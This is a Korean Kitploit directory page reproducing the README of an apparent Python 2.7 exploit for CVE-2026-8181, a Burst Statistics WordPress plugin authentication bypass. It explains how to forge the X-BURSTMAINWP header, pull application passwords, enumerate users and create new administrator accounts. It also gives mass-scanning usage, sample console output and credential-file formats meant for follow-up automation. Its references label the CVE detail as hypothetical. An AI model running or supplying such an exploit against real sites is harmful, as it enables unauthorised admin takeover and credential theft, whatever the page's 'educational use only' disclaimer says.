Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/jenderal92/cve-2026-8181
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHubjenderal92/cve-2026-8181

CVE-2026-8181

CVE-2026-8181: Burst Statistics 인증 우회 → REST API 탈취 및 관리자 생성. Python 2.7. 교육용으로만 사용하십시오.

저장소 보기
53개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-8181 - Burst Statistics 인증 우회 익스플로잇

Python 2.7 익스플로잇으로, Burst Statistics 플러그인 취약점(CVE-2026-8181)을 통해 인증되지 않은 공격자가 REST API 인증을 우회하고, 애플리케이션 비밀번호를 획득하며, 취약한 WordPress 사이트에 새로운 관리자 사용자를 생성할 수 있습니다.

⚠️ 면책 조항
이 도구는 교육 및 승인된 보안 테스트 목적으로만 사용됩니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 자신이 소유하거나 명시적 테스트 허가를 받은 웹사이트에서만 사용하십시오. 추가 면책 조항은 Jenderal92의 표지에서 확인할 수 있습니다. 여기에서 확인하세요!!!

CVE-2026-8181은 WordPress용 Burst Statistics 플러그인(패치 이전 버전)에 영향을 미칩니다. 이 결함은 REST API 인증 메커니즘에 있으며, 공격자가 다음을 수행할 수 있습니다:

  • 조작된 X-BURSTMAINWP 헤더를 전송하여 인증 우회
  • /burst/v1/mainwp-auth 엔드포인트를 통해 애플리케이션 비밀번호 검색
  • WordPress REST API를 통해 권한 있는 작업 수행 (사용자 목록, 설정 읽기, 새 관리자 계정 생성)

기능

  • 멀티스레드 스캐닝 (기본 10개 스레드)
  • WordPress 기본 경로 자동 감지 (/, /wordpress, /wp)
  • /wp-json/wp/v2/users 또는 작성자 ID 리디렉션을 통한 사용자 이름 열거
  • 인증 우회를 악용하여:
    • 애플리케이션 비밀번호 획득 (Base64 인코딩 토큰)
    • 민감한 REST 엔드포인트 접근 확인 (설정, 플러그인, 관리자 사용자)
    • 무작위 자격 증명을 가진 새 관리자 사용자 생성
  • 두 개의 출력 파일:
    • res_login.txt – 간결한 파이프로 구분된 REST API 자격 증명 (파싱/임포트 용이)
    • full_res_login.txt – 접근 확인 및 애플리케이션 비밀번호를 포함한 완전한 사람이 읽기 쉬운 보고서
  • 요구 사항

    • Python 2.7 (더 이상 사용되지 않지만 스크립트에 필요)
    • requests 라이브러리
    root@kitploit:~
    pip install requests
    

    사용법

    1. 대상 목록 파일 준비 (한 줄에 하나의 도메인 또는 IP, http:///https:// 유무 상관 없음).

      예시 targets.txt:

      root@kitploit:~
      example.com
      https://vulnerable-site.com
      127.0.0.1/wordpress
      
    2. 익스플로잇 실행:

    root@kitploit:~
    python2 CVE-2026-8181.py targets.txt
    
    1. 결과는 현재 디렉토리의 두 파일에 저장됩니다:
      • res_login.txt – REST API 자격 증명 (취약한 대상당 한 줄)
      • full_res_login.txt – 상세 보고서

    명령줄 옵션

    ArgumentDescription
    list.txt대상 URL을 포함한 파일 경로

    콘솔 예시 출력

    root@kitploit:~
    ============================================================
    CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
    ============================================================
    [*] Total targets: 2
    [*] Threads: 10
    [*] Base paths: ['', '/wordpress', '/wp']
    
    [*] Scanning: example.com
        Trying path: /
        Detected username: admin
        [+] VULNERABLE! REST API bypass successful
        [+] Application Password obtained!
        [+]   Username: admin
        [+]   App Password: xxxx xxxx xxxx
        [+]   Base64 Token: YWRtaW46eHh4eA==
        [+] Access confirmed: WordPress settings
        [+] Access confirmed: Installed plugins
        [+] Access confirmed: Admin users
        [+] Admin user created via REST API: wp_abc123
        [+] Results saved to res_login.txt and full_res_login.txt
    

    출력 파일 형식

    1. res_login.txt – 간결한 REST API 자격 증명

    각 줄은 다음 파이프로 구분된 형식을 따릅니다:

    root@kitploit:~
    target|username|password|email|user_id
    

    예:

    root@kitploit:~
    http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
    

    이 형식은 다음에 적합합니다:

    • 비밀번호 관리자나 데이터베이스로 가져오기
    • 추가 작업 자동화 (예: 로그인 스크립트)
    • cut, grep 또는 Excel로 빠르게 검사

    2. full_res_login.txt – 완전한 상세 보고서

    각 취약한 대상에 대해 스크립트는 사람이 읽기 쉬운 블록을 추가합니다:

    root@kitploit:~
    ============================================================
    Target: http://example.com
    ============================================================
    
    [+] Access Verification:
        [+] WordPress settings
        [+] Installed plugins
        [+] Admin users
    
    [+] REST API Credentials:
        Username: wp_abc123
        Password: random12char
        Email: [email protected]
        User ID: 42
        URL: http://example.com/wp-admin/
        Note: Use with X-BURSTMAINWP header
    
    [+] Application Password:
        Username: admin
        App Password: xxxx xxxx xxxx
        Base64 Token: YWRtaW46eHh4eA==
    

    참고: 애플리케이션 비밀번호 엔드포인트를 사용할 수 없거나 토큰을 반환하지 않으면 해당 섹션에 FAILED가 표시됩니다.

    작동 방식

    1. 대상 준비 – 누락된 경우 http:// 접두사를 추가하고, 끝에 있는 슬래시를 제거합니다.
    2. 경로 반복 – /, /wordpress, /wp를 WordPress 기본 디렉토리로 시도합니다.
    3. 사용자 이름 열거 – /wp-json/wp/v2/users를 가져오거나 ?author=N 리디렉션을 사용합니다.
    4. 우회 테스트 – X-BURSTMAINWP: 1 + 사용자 이름과 더미 비밀번호(CVE-2026-8181)로 Basic 인증을 전송합니다. 엔드포인트 /wp-json/wp/v2/users/me?context=edit가 200을 반환하면 사이트가 취약합니다.
    5. 악용 –
      • 애플리케이션 비밀번호 토큰을 검색하기 위해 /wp-json/burst/v1/mainwp-auth를 요청합니다.
      • /settings, /plugins, /users에 대한 접근을 확인합니다.
      • POST /wp-json/wp/v2/users를 통해 새 관리자 계정을 생성합니다.
    6. 결과 저장 – 간결한 REST 자격 증명을 res_login.txt에, 전체 세부 정보를 full_res_login.txt에 기록합니다.

    사용자 지정

    스크립트 내에서 다음 변수를 수정할 수 있습니다:

    • THREADS – 동시 스레드 수 (기본 10)
    • BASE_PATHS – 확인할 추가 WordPress 하위 디렉토리
    • requests 타임아웃 값

    라이선스

    이 프로젝트는 교육 목적으로만 제공됩니다. 사용에 따른 책임은 본인에게 있습니다.

    참고 자료

    • CVE-2026-8181 Detail (가상)
    • Burst Statistics 플러그인 (영향받는 버전)
    도구 다운로드